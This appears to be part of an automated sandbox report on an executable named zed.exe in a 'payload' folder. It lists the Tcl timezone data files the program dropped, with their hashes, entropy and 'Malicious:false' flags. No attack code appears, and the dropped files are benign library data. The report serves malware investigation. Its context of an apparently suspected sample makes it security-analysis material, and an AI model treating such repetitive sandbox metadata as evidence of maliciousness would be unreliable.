                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Antarctica/Troll) {.. {-9223372036854775808 0 0 -00}.. {1108166400 0 0 +00}.. {1111885200 7200 1 +02}.. {1130634000 0 0 +00}.. {1143334800 7200 1 +02}.. {1162083600 0 0 +00}.. {1174784400 7200 1 +02}.. {1193533200 0 0 +00}.. {1206838800 7200 1 +02}.. {1224982800 0 0 +00}.. {1238288400 7200 1 +02}.. {1256432400 0 0 +00}.. {1269738000 7200 1 +02}.. {1288486800 0 0 +00}.. {1301187600 7200 1 +02}.. {1319936400 0 0 +00}.. {1332637200 7200 1 +02}.. {1351386000 0 0 +00}.. {1364691600 7200 1 +02}.. {1382835600 0 0 +00}.. {1396141200 7200 1 +02}.. {1414285200 0 0 +00}.. {1427590800 7200 1 +02}.. {1445734800 0 0 +00}.. {1459040400 7200 1 +02}.. {1477789200 0 0 +00}.. {1490490000 7200 1 +02}.. {1509238800 0 0 +00}.. {1521939600 7200 1 +02}.. {1540688400 0 0 +00}.. {1553994000 7200 1 +02}.. {1572138000 0 0 +00}.. {1585443600 7200 1 +02}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):179
                                                                                                                                                                                                                                            Entropy (8bit):4.940298769001579
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8s4YkyXHAIgNrYOARL/2L0GRHEoKcMFeWFKjov:SlSWB9vsM3yMGSHAIgvAN/2L0XcMFewh
                                                                                                                                                                                                                                            MD5:F61B4D02530B54A8EB1CA7B34BF6D553
                                                                                                                                                                                                                                            SHA1:EB85E044EF9F7D11310C5EBB8D1D0C49A1E3067F
                                                                                                                                                                                                                                            SHA-256:1892E98C13AC141C8C92EAB942B073A464BA5E2C000C250F97F860BE6B108127
                                                                                                                                                                                                                                            SHA-512:E725E909A4056B7E4FADBE66B69E6C4752595F3357E670A7D740A2DA957F2C9502ECA57B9BA874045ED032B8F65A10D11AFAF69EA9673187FD4AE08793492470
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Urumqi)]} {.. LoadTimeZoneFile Asia/Urumqi..}..set TZData(:Antarctica/Vostok) $TZData(:Asia/Urumqi)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):187
                                                                                                                                                                                                                                            Entropy (8bit):4.947168975083595
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/y+YF3vXHAIgoq8yFRRL/2XbeLo4cA4FH/h8QahV:SlSWB9vsM3ymhVoPHAIgoh6N/2XbUyAH
                                                                                                                                                                                                                                            MD5:A4F076D7D716467B78EA382FA222CB38
                                                                                                                                                                                                                                            SHA1:21D7FBA308ADC652F541A0336929B862F7B1BD0B
                                                                                                                                                                                                                                            SHA-256:25462B656D240DA6B01C1A630FAC04B25DD65C799B659BE1C8BD3AB62610966F
                                                                                                                                                                                                                                            SHA-512:1B6BD455E533D5BDC7F3506561A9CA804B1F9CA5CC0665AAB0FC083106AB32FF149DD5FFF62EF7BABAD87E3274F264446D492FB8BE160C9C7F281C7060BF1F61
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Berlin)]} {.. LoadTimeZoneFile Europe/Berlin..}..set TZData(:Arctic/Longyearbyen) $TZData(:Europe/Berlin)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):171
                                                                                                                                                                                                                                            Entropy (8bit):4.829666491766117
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8t14XHAIgNsM13oOARL/2WFK4h4WFK81Fn:SlSWB9vsM3yN14HAIgaM1YOAN/2wKs46
                                                                                                                                                                                                                                            MD5:60D7F3194F19179E0CF0F561F9C40EE6
                                                                                                                                                                                                                                            SHA1:B079EC49485CFBFFB7A5BE6149319B75684258E9
                                                                                                                                                                                                                                            SHA-256:8FCDDB246932BAED880B70C0CA867057E7989AEA55EDDC174430E1055CD1058D
                                                                                                                                                                                                                                            SHA-512:0BDC86B1D473D4875C6F7C092F955D0999E6C1F2EF83CFC7726A3C5BFEB0F5CB8E00B1F0CBC1F91F806EC635C472927504DF681A32DAC55EF372DA16FEA9EF40
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Riyadh)]} {.. LoadTimeZoneFile Asia/Riyadh..}..set TZData(:Asia/Aden) $TZData(:Asia/Riyadh)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1637
                                                                                                                                                                                                                                            Entropy (8bit):3.732051305399264
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5qehddmvOt81FCuLqecDngO6jPvTpYy5T4TXvKT10SvPFu+a+CK/Eu3CWuD0Vob1:5YvdJqxiF0rvK50Sv9fGSM
                                                                                                                                                                                                                                            MD5:D6BCB21F65642F36A159AFD72EC93953
                                                                                                                                                                                                                                            SHA1:D3E670E579924E6E4F04AB574D48334FF521D8B2
                                                                                                                                                                                                                                            SHA-256:06DC608C0B8CDD69CCE66A6BF86F141C46DF39CB45312E684E46F19ED8CAFF15
                                                                                                                                                                                                                                            SHA-512:9A633B629873E5EE5AF923A94865EBE5FD9ECA181B2C47B7368A0828468715E07AD3FD825D5E2312D2D0BA1FA5490E3817C36B6339824C8012A0B75538C4A0DC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Almaty) {.. {-9223372036854775808 18468 0 LMT}.. {-1441170468 18000 0 +05}.. {-1247547600 21600 0 +06}.. {354909600 25200 1 +06}.. {370717200 21600 0 +06}.. {386445600 25200 1 +06}.. {402253200 21600 0 +06}.. {417981600 25200 1 +06}.. {433789200 21600 0 +06}.. {449604000 25200 1 +06}.. {465336000 21600 0 +06}.. {481060800 25200 1 +06}.. {496785600 21600 0 +06}.. {512510400 25200 1 +06}.. {528235200 21600 0 +06}.. {543960000 25200 1 +06}.. {559684800 21600 0 +06}.. {575409600 25200 1 +06}.. {591134400 21600 0 +06}.. {606859200 25200 1 +06}.. {622584000 21600 0 +06}.. {638308800 25200 1 +06}.. {654638400 21600 0 +06}.. {670363200 18000 0 +05}.. {670366800 21600 1 +05}.. {686091600 18000 0 +05}.. {695768400 21600 0 +06}.. {701812800 25200 1 +06}.. {717537600 21600 0 +06}.. {733262400 25200 1 +06}.. {748987200 21600 0 +06}.. {764712
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2682
                                                                                                                                                                                                                                            Entropy (8bit):3.7873260611521915
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5MUNHl0Nhb9bGA9jSb0PWtsjOuH7Ay2n3yy7QYoTZg703q4oPuJ9/YXjpdaOP9kA:Fz0T52akyId7+xOXdkwqeIFcR
                                                                                                                                                                                                                                            MD5:7E70BD44FBF5BF70E3C5246D3A83A49B
                                                                                                                                                                                                                                            SHA1:10A28B0A3189DF347CF9853C024E9467CAC56DBA
                                                                                                                                                                                                                                            SHA-256:B70AABECACD3F62AF506DF395AB44F47F2CA091522B04EC87AC1407172DD1BFA
                                                                                                                                                                                                                                            SHA-512:766565F837EB777749B2C8AAE6C73A2274A772CEF12E7C2E30A89809FEF1E9ED6B067DF044A4676AA4BE76A64A904692C3887336BF01BA4D5D9A5020FB792938
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Amman) {.. {-9223372036854775808 8624 0 LMT}.. {-1230776624 7200 0 EET}.. {108165600 10800 1 EEST}.. {118270800 7200 0 EET}.. {136591200 10800 1 EEST}.. {149806800 7200 0 EET}.. {168127200 10800 1 EEST}.. {181342800 7200 0 EET}.. {199749600 10800 1 EEST}.. {215643600 7200 0 EET}.. {231285600 10800 1 EEST}.. {244501200 7200 0 EET}.. {262735200 10800 1 EEST}.. {275950800 7200 0 EET}.. {481154400 10800 1 EEST}.. {496962000 7200 0 EET}.. {512949600 10800 1 EEST}.. {528670800 7200 0 EET}.. {544399200 10800 1 EEST}.. {560120400 7200 0 EET}.. {575848800 10800 1 EEST}.. {592174800 7200 0 EET}.. {610581600 10800 1 EEST}.. {623624400 7200 0 EET}.. {641167200 10800 1 EEST}.. {655074000 7200 0 EET}.. {671839200 10800 1 EEST}.. {685918800 7200 0 EET}.. {702856800 10800 1 EEST}.. {717973200 7200 0 EET}.. {733701600 10800 1 EEST}.. {749422800
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2086
                                                                                                                                                                                                                                            Entropy (8bit):3.7698340044911616
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5DeEdVrEOeFt7YFpR2kHmxCcUdBbcHDLV2vpXt25A0UeRr9ydzkMfF6USRWk9UuV:5ZejsFLrcZwvJt2F+doTr9Q3G80
                                                                                                                                                                                                                                            MD5:6EFC35043BDCA4AB61D72E931DB954E6
                                                                                                                                                                                                                                            SHA1:F0B4E76C154DC773073E41AA8E94030E972A986A
                                                                                                                                                                                                                                            SHA-256:D9DF64FDA4638F7604624B0F68A885D5ABADB1DE12AF1AF5581C2AF7DD971562
                                                                                                                                                                                                                                            SHA-512:16AE582B113D6960C73B64620A8AF20F9D436AA4B3EC8E881617AED3389EB4357931882103F162F19EE8202953A7E6FB4FDD6D7760FB7621F4DB9D229AD13F17
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Anadyr) {.. {-9223372036854775808 42596 0 LMT}.. {-1441194596 43200 0 +12}.. {-1247572800 46800 0 +14}.. {354884400 50400 1 +14}.. {370692000 46800 0 +13}.. {386420400 43200 0 +13}.. {386424000 46800 1 +13}.. {402231600 43200 0 +12}.. {417960000 46800 1 +13}.. {433767600 43200 0 +12}.. {449582400 46800 1 +13}.. {465314400 43200 0 +12}.. {481039200 46800 1 +13}.. {496764000 43200 0 +12}.. {512488800 46800 1 +13}.. {528213600 43200 0 +12}.. {543938400 46800 1 +13}.. {559663200 43200 0 +12}.. {575388000 46800 1 +13}.. {591112800 43200 0 +12}.. {606837600 46800 1 +13}.. {622562400 43200 0 +12}.. {638287200 46800 1 +13}.. {654616800 43200 0 +12}.. {670341600 39600 0 +12}.. {670345200 43200 1 +12}.. {686070000 39600 0 +11}.. {695746800 43200 0 +13}.. {701791200 46800 1 +13}.. {717516000 43200 0 +12}.. {733240800 46800 1 +13}.. {748965
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1665
                                                                                                                                                                                                                                            Entropy (8bit):3.7149890651919644
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5uvFlvNhQQvmRKqv0fvzQIovWdvEGvDaDvs5vZlovKWyvNSvTqvIkhYwr:sFBNKs6b03zB0WJEuDa7sFZiKWaN6TiF
                                                                                                                                                                                                                                            MD5:A72FB1FE01C93BD7E0A8136635C72639
                                                                                                                                                                                                                                            SHA1:2383CF839F50784D4BF8B7EDDB324C80E2DDD0DC
                                                                                                                                                                                                                                            SHA-256:96B510AF9B8C6BC1DFA84E9ED5E072F3FD484EEB66BBEBC7B6826ED859ED9027
                                                                                                                                                                                                                                            SHA-512:061FECE3C750C0229638DD8AF38FB3E8E48E59E0DE1B13BCFE46483A7A170B71B9BCB0D6F110B6B2EF68510FA940F9066F14CBD59829E222D6644D3657CE1893
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Aqtau) {.. {-9223372036854775808 12064 0 LMT}.. {-1441164064 14400 0 +04}.. {-1247544000 18000 0 +05}.. {370724400 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 14400 0 +04}.. {670370400 18000 1 +04}.. {686095200 14400 0 +04}.. {695772000 18000 0 +05}.. {701816400 21600 1 +05}.. {717541200 18000 0 +05}.. {733266000 21600 1 +05}.. {748990800 18000 0 +05}.. {7647156
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1666
                                                                                                                                                                                                                                            Entropy (8bit):3.721746335201775
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5FUvalvNhQQvmRKqv0fvzQIovWdvEGvDaDvs5vZlovKWyvNSvTqvIQvyovklvqQR:PwaBNKs6b03zB0WJEuDa7sFZiKWaN6Tt
                                                                                                                                                                                                                                            MD5:E278B985BD2515DBCAED8CB741BE9208
                                                                                                                                                                                                                                            SHA1:BC9F5E72C430661D7ED1AF04571CE5D0F73DD18D
                                                                                                                                                                                                                                            SHA-256:991638FA2AB2A2F7A091A23D78D99306EE73A740F1A03FBAC448EDCAB55A0E38
                                                                                                                                                                                                                                            SHA-512:9951DB729B837647CC4B3D2E605525DCCBAFFD39D76460331BF62235DCAE5E4470CDA578F940B1739AABFEC55D293FF60D79AE0EFDFE1EB64E84571881FDEA6A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Aqtobe) {.. {-9223372036854775808 13720 0 LMT}.. {-1441165720 14400 0 +04}.. {-1247544000 18000 0 +05}.. {354913200 21600 1 +06}.. {370720800 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 14400 0 +04}.. {670370400 18000 1 +04}.. {686095200 14400 0 +04}.. {695772000 18000 0 +05}.. {701816400 21600 1 +05}.. {717541200 18000 0 +05}.. {733266000 21600 1 +05}.. {748990
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):878
                                                                                                                                                                                                                                            Entropy (8bit):3.937249024843323
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5ggeRMdIQvNcDvNhQQvmRKqvzQfv7PQIovWxrvEGvDWdDvs5v/RlovKTob3CGcr:5gbkvNSvNhQQvmRKqv0fvzQIovWdvEGD
                                                                                                                                                                                                                                            MD5:259179C7A1CA04F9F3A373B6C8FCB8C5
                                                                                                                                                                                                                                            SHA1:D042DF8EFD8EC1473B45B1131BD5EB714F1B2C17
                                                                                                                                                                                                                                            SHA-256:13745BFA25E6E2D8D0FABAE42CB7C37CF9F974CFB343D4FE84E4E2D64A25926B
                                                                                                                                                                                                                                            SHA-512:703BEAD5A1E5B3816D98057A08A87C2139F418787F38561FE35175B84E2005365727F85D1B949CC5DF464B207A7D01BB65FB1A632E73DDA523E843B82D76FBBD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Ashgabat) {.. {-9223372036854775808 14012 0 LMT}.. {-1441166012 14400 0 +04}.. {-1247544000 18000 0 +05}.. {354913200 21600 1 +05}.. {370720800 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 14400 0 +04}.. {670370400 18000 1 +04}.. {686095200 14400 0 +04}.. {695772000 18000 0 +05}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):182
                                                                                                                                                                                                                                            Entropy (8bit):4.801820439218014
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8xEYM4DyXHAIgN/ZEYovFvWARL/2WFKUNSH+WFKYEQ:SlSWB9vsM3yR+HAIgH8VWAN/2wKUNSeq
                                                                                                                                                                                                                                            MD5:5193EF7ADB646798801245BC50C8DDA6
                                                                                                                                                                                                                                            SHA1:83ED851CBC60EFB330A8FC119E1BED5B4C0BA630
                                                                                                                                                                                                                                            SHA-256:2C752F641B98E3C05B14AE31330D1F198DAA4A7E354BA9670C7754926BFB891A
                                                                                                                                                                                                                                            SHA-512:E940E1BE67A9AC895F3D060B1CB34797A429147A9DC2AC0F1162D37D86661EF217EDABA720F0AE3796186FE801229210AC785BB4511CBBE5A41791D236101D8C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Ashgabat)]} {.. LoadTimeZoneFile Asia/Ashgabat..}..set TZData(:Asia/Ashkhabad) $TZData(:Asia/Ashgabat)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1666
                                                                                                                                                                                                                                            Entropy (8bit):3.7265766742957402
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:55TvFlvNhQQvmRKqv0fvzQIovWdvEGvDaDvs5vZlovKWyvNSvTqvIQvyovklvqQJ:XrFBNKs6b03zB0WJEuDa7sFZiKWaN6Tl
                                                                                                                                                                                                                                            MD5:0236793F90ABC6F68718DDBB44AF5E2F
                                                                                                                                                                                                                                            SHA1:A5EFAEEF9B9159E748A3FED231F8A978E400482E
                                                                                                                                                                                                                                            SHA-256:4B7B118E6AE72D41740CF0CB2BD8E970700758DCBC0DD6F298199D841DF8408E
                                                                                                                                                                                                                                            SHA-512:851C7A9C110790454312BB9C5B5D3C426365EEF4673191B9ABB2E4A32301894C5FB1ADCBE2A4C67BEE416AD63FB8BED85F94EF9BF42473DA4BFFA7824935A1D5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Atyrau) {.. {-9223372036854775808 12464 0 LMT}.. {-1441164464 10800 0 +03}.. {-1247540400 18000 0 +05}.. {370724400 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 14400 0 +04}.. {670370400 18000 1 +04}.. {686095200 14400 0 +04}.. {695772000 18000 0 +05}.. {701816400 21600 1 +05}.. {717541200 18000 0 +05}.. {733266000 21600 1 +05}.. {748990800 18000 0 +05}.. {764715
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1702
                                                                                                                                                                                                                                            Entropy (8bit):3.7261419515679393
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5/eVvyGiHD6UC4UrUomFMmUZcjbUKNFcUEUvUOpU8MYUWCUlbf/U9bUiUUybUQUF:5m8G9mFdnNF1FfsTuvQXHCe
                                                                                                                                                                                                                                            MD5:690013310A46BD1AE250A5E019353809
                                                                                                                                                                                                                                            SHA1:0DF434C7EEB707DC071007FAB112F4DEB37E936F
                                                                                                                                                                                                                                            SHA-256:D20B75D2604C3B742C1629C5EE02CFF6783E472249982B272B68F2A6DE9BDC38
                                                                                                                                                                                                                                            SHA-512:FF8C33E55E4F006C38D3FD37A1AD3E1200718CA374ECBEAE8255C7635912F0BB23A59A600BF7130D5660A24C515F726E8440D0D908E560CB59F74059638E6AA2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Baghdad) {.. {-9223372036854775808 10660 0 LMT}.. {-2524532260 10656 0 BMT}.. {-1641005856 10800 0 +03}.. {389048400 14400 0 +03}.. {402264000 10800 0 +03}.. {417906000 14400 1 +03}.. {433800000 10800 0 +03}.. {449614800 14400 1 +03}.. {465422400 10800 0 +03}.. {481150800 14400 1 +03}.. {496792800 10800 0 +03}.. {512517600 14400 1 +03}.. {528242400 10800 0 +03}.. {543967200 14400 1 +03}.. {559692000 10800 0 +03}.. {575416800 14400 1 +03}.. {591141600 10800 0 +03}.. {606866400 14400 1 +03}.. {622591200 10800 0 +03}.. {638316000 14400 1 +03}.. {654645600 10800 0 +03}.. {670464000 14400 1 +03}.. {686275200 10800 0 +03}.. {702086400 14400 1 +03}.. {717897600 10800 0 +03}.. {733622400 14400 1 +03}.. {749433600 10800 0 +03}.. {765158400 14400 1 +03}.. {780969600 10800 0 +03}.. {796694400 14400 1 +03}.. {812505600 10800 0 +03}.. {82831
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):171
                                                                                                                                                                                                                                            Entropy (8bit):4.784355129067593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8hkXHAIgNvZORL/2WFKENUKMFB/4WFKKB:SlSWB9vsM3yBkHAIgPON/2wKENUr/4wT
                                                                                                                                                                                                                                            MD5:1B5E0D449DAEF469D586A853CB3073AD
                                                                                                                                                                                                                                            SHA1:FD735B0472B31644E787767B82B737CC39EC4175
                                                                                                                                                                                                                                            SHA-256:3D437037FBF2BBDF969C8E71967080947F24860D431B39F5D8F23151316ABCD5
                                                                                                                                                                                                                                            SHA-512:2A2DC33D4258A5E1AE59172883F3B11723798ED35CF5AF1B8BA81A8807DC6F8222C8044D82B152EF6AF43E7350FEB2625D4406C6C7DD309CE65810EA3D3286B6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Qatar)]} {.. LoadTimeZoneFile Asia/Qatar..}..set TZData(:Asia/Bahrain) $TZData(:Asia/Qatar)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2149
                                                                                                                                                                                                                                            Entropy (8bit):3.6155622322573713
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5/eFdqlykbocXcwJUE5iu8JmFebARoc9lVNk7/9bq8dq16b3C9UPBUTIEjvZJ+76:5RsUf8mFpNWFny1ZGMte3aivUKo
                                                                                                                                                                                                                                            MD5:294DFC98F67AC00A188EC3D3B87C501C
                                                                                                                                                                                                                                            SHA1:93C434CD9AA170E35AD676C88EE09986A94EC02A
                                                                                                                                                                                                                                            SHA-256:873E8F08B87610D0DAFE239D32345248A4595C6B13D1DA83EC214D78E88FA12C
                                                                                                                                                                                                                                            SHA-512:5346082CCA733724C0D2C36B768467E59BA9ED6452B6CF1BA923AF4F0D2BC05C67DB49E804CA81DAD449D30D0835026D708D9AB632D02FDA1EA1A0BF717111DE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Baku) {.. {-9223372036854775808 11964 0 LMT}.. {-1441163964 10800 0 +03}.. {-405140400 14400 0 +04}.. {354916800 18000 1 +04}.. {370724400 14400 0 +04}.. {386452800 18000 1 +04}.. {402260400 14400 0 +04}.. {417988800 18000 1 +04}.. {433796400 14400 0 +04}.. {449611200 18000 1 +04}.. {465343200 14400 0 +04}.. {481068000 18000 1 +04}.. {496792800 14400 0 +04}.. {512517600 18000 1 +04}.. {528242400 14400 0 +04}.. {543967200 18000 1 +04}.. {559692000 14400 0 +04}.. {575416800 18000 1 +04}.. {591141600 14400 0 +04}.. {606866400 18000 1 +04}.. {622591200 14400 0 +04}.. {638316000 18000 1 +04}.. {654645600 14400 0 +04}.. {670370400 10800 0 +03}.. {670374000 14400 1 +03}.. {686098800 10800 0 +03}.. {701823600 14400 1 +03}.. {717548400 14400 0 +04}.. {820440000 14400 0 +04}.. {828234000 18000 1 +05}.. {846378000 14400 0 +04}.. {852062400
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):181
                                                                                                                                                                                                                                            Entropy (8bit):4.911309754748998
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/2WFKELYOiMXGm2OHB+keoHvZKmrROpDovFFsQ+8EXVeVSYe:SlSWB9eg/2wKELeDm2OHxeoHvZ3FO1og
                                                                                                                                                                                                                                            MD5:9AC4947AC29C797055B7EBFA4F6AC710
                                                                                                                                                                                                                                            SHA1:E7758A9A8BFA255F6B2D27F5366D9FE2A26DDF6C
                                                                                                                                                                                                                                            SHA-256:6E72BA908F250FD45D554A12E3E7B3BD2F1C02A6C2431F806FD2A054F843AA90
                                                                                                                                                                                                                                            SHA-512:F9D0F0CB7D3726C2AB3B5049429172D9DD4BA21353F6F98570CBA4EE969F7D97BD973CB165AECFF930AFFA8633E8052624D44EE7FB91763681ED3F78A61F4F98
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Bangkok) {.. {-9223372036854775808 24124 0 LMT}.. {-2840164924 24124 0 BMT}.. {-1570084924 25200 0 +07}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
